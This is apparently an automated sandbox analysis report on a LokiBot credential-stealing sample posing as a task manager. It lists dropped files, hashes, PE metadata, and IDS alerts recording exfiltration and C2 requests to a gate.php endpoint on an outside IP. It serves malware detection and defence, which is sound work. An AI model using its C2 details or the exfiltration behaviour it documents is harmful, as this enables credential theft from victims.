                                            • Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, ocsp.digicert.com, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

Time: 09:18:34
Type: API Interceptor
Description: 78x Sleep call for process: FJbeidnZOF.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            No context

                                            Domains

                                            No context

                                            ASN

                                            No context

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FJbeidnZOF.exe.log
Process: C:\Users\user\Desktop\FJbeidnZOF.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1314
Entropy (8bit): 5.350128552078965
Encrypted: false
SSDEEP: 24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5: 1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1: B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256: 28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512: 95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
Process: C:\Users\user\Desktop\FJbeidnZOF.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Reputation: high, very likely benign file
Preview: 1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a
Process: C:\Users\user\Desktop\FJbeidnZOF.exe
File Type: data
Category: dropped
Size (bytes): 14766
Entropy (8bit): 0.6033607178908347
Encrypted: false
SSDEEP: 3:/lbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllb5:u
MD5: ACB2CF019753BD97F39EAF340F19DDB0
SHA1: AB0777D22170D696D19781B51F5C8F5670C9238D
SHA-256: A5D9728EE9A220ECDBD8E56F368B49DCEF124B40B9E8CABEC7B76BB8A0C0736E
SHA-512: C16AB53BEEF0F815E51961F6654BCA197DF6C446F1827951363EBB5A6EF3CF2E6CA78736DCA8532FF4C0FAE9288E7F6B4CE3B0809E475B07E52C20F098732CB9
Malicious: false
Reputation: low

                                            Static File Info

                                            General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.343638699941567
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: FJbeidnZOF.exe
File size: 653824
MD5: 0b43c829af2eb773a3614b02ba5b8c5f
SHA1: bc55a69ca1a72f9f0761112c05b3938aebad1c43
SHA256: 25b6f68e2bf505cfde67c533f5d12e869b30efe831fa82fd91c2c29f59fc77ac
SHA512: b217e62b84ee1ff57bb71195a0758ead6821c3cd21b9d48b710cc0a972b2740001e87edeaa22dd10800446ec15733ef5fa51eb58f2ca6d3129b351d9d2c99402
SSDEEP: 12288:gcqJFeA7KVpZNpeISb8XyIz5d10KaEjv+y3ZEdNdY8S:r2F6zExbyyIf1Vjv+ysdpS
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b+.`................................. ........@.. .......................@............@................................

                                            File Icon

                                            Icon Hash:c2aabbabb3b3aad2

                                            Static PE Info

                                            General

                                            Entrypoint:0x48f9fe
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                            Time Stamp:0x608A2B62 [Thu Apr 29 03:43:30 2021 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:v4.0.30319
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                            Entrypoint Preview

                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al   (this instruction, the disassembly of 0x00 0x00 padding, repeats for the remaining 97 lines of the preview)

                                            Data Directories

                                            Name | Virtual Address | Virtual Size | Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8f9ac | 0x4f | .text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x90000 | 0x11a00 | .rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa2000 | 0xc | .reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                            Sections

                                            Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                            .text | 0x2000 | 0x8da04 | 0x8dc00 | False | 0.785647114749 | data | 7.61153237798 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                            .rsrc | 0x90000 | 0x11a00 | 0x11a00 | False | 0.0666694370567 | data | 3.61282474144 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc | 0xa2000 | 0xc | 0x200 | False | 0.041015625 | data | 0.0815394123432 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            Name | RVA | Size | Type | Language | Country
                                            RT_ICON | 0x90100 | 0x10828 | dBase III DBT, version number 0, next free block index 40 | |
                                            RT_GROUP_ICON | 0xa0938 | 0x14 | data | |
                                            RT_VERSION | 0xa095c | 0x36c | data | |
                                            RT_MANIFEST | 0xa0cd8 | 0xd17 | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators | |

                                            Imports

                                            DLL | Import
                                            mscoree.dll | _CorExeMain

                                            Version Infos

                                            Description | Data
                                            Translation | 0x0000 0x04b0
                                            LegalCopyright | Copyright 2015
                                            Assembly Version | 4.0.2.0
                                            InternalName | SoapServices.exe
                                            FileVersion | 4.1.0.0
                                            CompanyName |
                                            LegalTrademarks |
                                            Comments | External Task Manager
                                            ProductName | TaskManager
                                            ProductVersion | 4.1.0.0
                                            FileDescription | Tino's TaskManager
                                            OriginalFilename | SoapServices.exe

                                            Network Behavior

                                            Snort IDS Alerts

                                            Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                            04/29/21-09:18:44.502476 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49721 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:44.502476 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49721 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:44.502476 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49721 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:44.502476 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49721 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:44.502476 | TCP | 2017930 | ET TROJAN Trojan Generic - POST To gate.php with no referer | 49721 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:45.816121 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49723 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:45.816121 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49723 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:45.816121 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49723 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:45.816121 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49723 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:45.816121 | TCP | 2017930 | ET TROJAN Trojan Generic - POST To gate.php with no referer | 49723 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:46.975892 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49725 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:46.975892 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49725 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:46.975892 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49725 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:46.975892 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49725 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:46.975892 | TCP | 2017930 | ET TROJAN Trojan Generic - POST To gate.php with no referer | 49725 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:48.534119 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49726 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:48.534119 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49726 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:48.534119 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49726 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:48.534119 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49726 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:48.534119 | TCP | 2017930 | ET TROJAN Trojan Generic - POST To gate.php with no referer | 49726 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:49.841095 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49727 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:49.841095 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49727 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:49.841095 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49727 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:49.841095 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49727 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:49.841095 | TCP | 2017930 | ET TROJAN Trojan Generic - POST To gate.php with no referer | 49727 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:51.066016 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49730 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:51.066016 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49730 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:51.066016 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49730 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:51.066016 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49730 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:51.066016 | TCP | 2017930 | ET TROJAN Trojan Generic - POST To gate.php with no referer | 49730 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:52.333278 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49731 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:52.333278 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49731 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:52.333278 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49731 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:52.333278 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49731 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:52.333278 | TCP | 2017930 | ET TROJAN Trojan Generic - POST To gate.php with no referer | 49731 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:53.571368 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49733 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:53.571368 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49733 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:53.571368 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49733 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:53.571368 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49733 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:53.571368 | TCP | 2017930 | ET TROJAN Trojan Generic - POST To gate.php with no referer | 49733 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:55.018479 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49734 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:55.018479 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49734 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:55.018479 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49734 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:55.018479 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49734 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:55.018479 | TCP | 2017930 | ET TROJAN Trojan Generic - POST To gate.php with no referer | 49734 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:56.255489 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49738 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:56.255489 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49738 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:56.255489 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49738 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:56.255489 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49738 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:56.255489 | TCP | 2017930 | ET TROJAN Trojan Generic - POST To gate.php with no referer | 49738 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:57.489684 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49739 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:57.489684 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49739 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:57.489684 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49739 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:57.489684 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49739 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:57.489684 | TCP | 2017930 | ET TROJAN Trojan Generic - POST To gate.php with no referer | 49739 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:58.739296 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49740 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:58.739296 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49740 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:58.739296 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49740 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:58.739296 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49740 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:18:58.739296 | TCP | 2017930 | ET TROJAN Trojan Generic - POST To gate.php with no referer | 49740 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:00.024705 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49741 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:00.024705 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49741 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:00.024705 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49741 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:00.024705 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49741 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:00.024705 | TCP | 2017930 | ET TROJAN Trojan Generic - POST To gate.php with no referer | 49741 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:01.421406 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49742 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:01.421406 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49742 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:01.421406 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49742 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:01.421406 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49742 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:01.421406 | TCP | 2017930 | ET TROJAN Trojan Generic - POST To gate.php with no referer | 49742 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:03.174503 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49743 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:03.174503 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49743 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:03.174503 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49743 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:03.174503 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49743 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:03.174503 | TCP | 2017930 | ET TROJAN Trojan Generic - POST To gate.php with no referer | 49743 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:04.404732 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49744 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:04.404732 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49744 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:04.404732 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49744 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:04.404732 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49744 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:04.404732 | TCP | 2017930 | ET TROJAN Trojan Generic - POST To gate.php with no referer | 49744 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:05.661257 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49745 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:05.661257 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49745 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:05.661257 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49745 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:05.661257 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49745 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:05.661257 | TCP | 2017930 | ET TROJAN Trojan Generic - POST To gate.php with no referer | 49745 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:07.091418 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49746 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:07.091418 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49746 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:07.091418 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49746 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:07.091418 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49746 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:07.091418 | TCP | 2017930 | ET TROJAN Trojan Generic - POST To gate.php with no referer | 49746 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:08.631182 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49747 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:08.631182 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49747 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:08.631182 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49747 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:08.631182 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49747 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:08.631182 | TCP | 2017930 | ET TROJAN Trojan Generic - POST To gate.php with no referer | 49747 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:09.846278 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49748 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:09.846278 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49748 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:09.846278 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49748 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:09.846278 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49748 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:09.846278 | TCP | 2017930 | ET TROJAN Trojan Generic - POST To gate.php with no referer | 49748 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:11.264756 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49749 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:11.264756 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49749 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:11.264756 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49749 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:11.264756 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49749 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:11.264756 | TCP | 2017930 | ET TROJAN Trojan Generic - POST To gate.php with no referer | 49749 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:12.481082 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49750 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:12.481082 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49750 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:12.481082 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49750 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:12.481082 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49750 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:12.481082 | TCP | 2017930 | ET TROJAN Trojan Generic - POST To gate.php with no referer | 49750 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:13.981783 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49753 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:13.981783 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49753 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:13.981783 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49753 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:13.981783 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49753 | 80 | 192.168.2.3 | 35.247.234.230
                                            04/29/21-09:19:13.981783 | TCP | 2017930 | ET TROJAN Trojan Generic - POST To gate.php with no referer | 49753 | 80 | 192.168.2.3 | 35.247.234.230
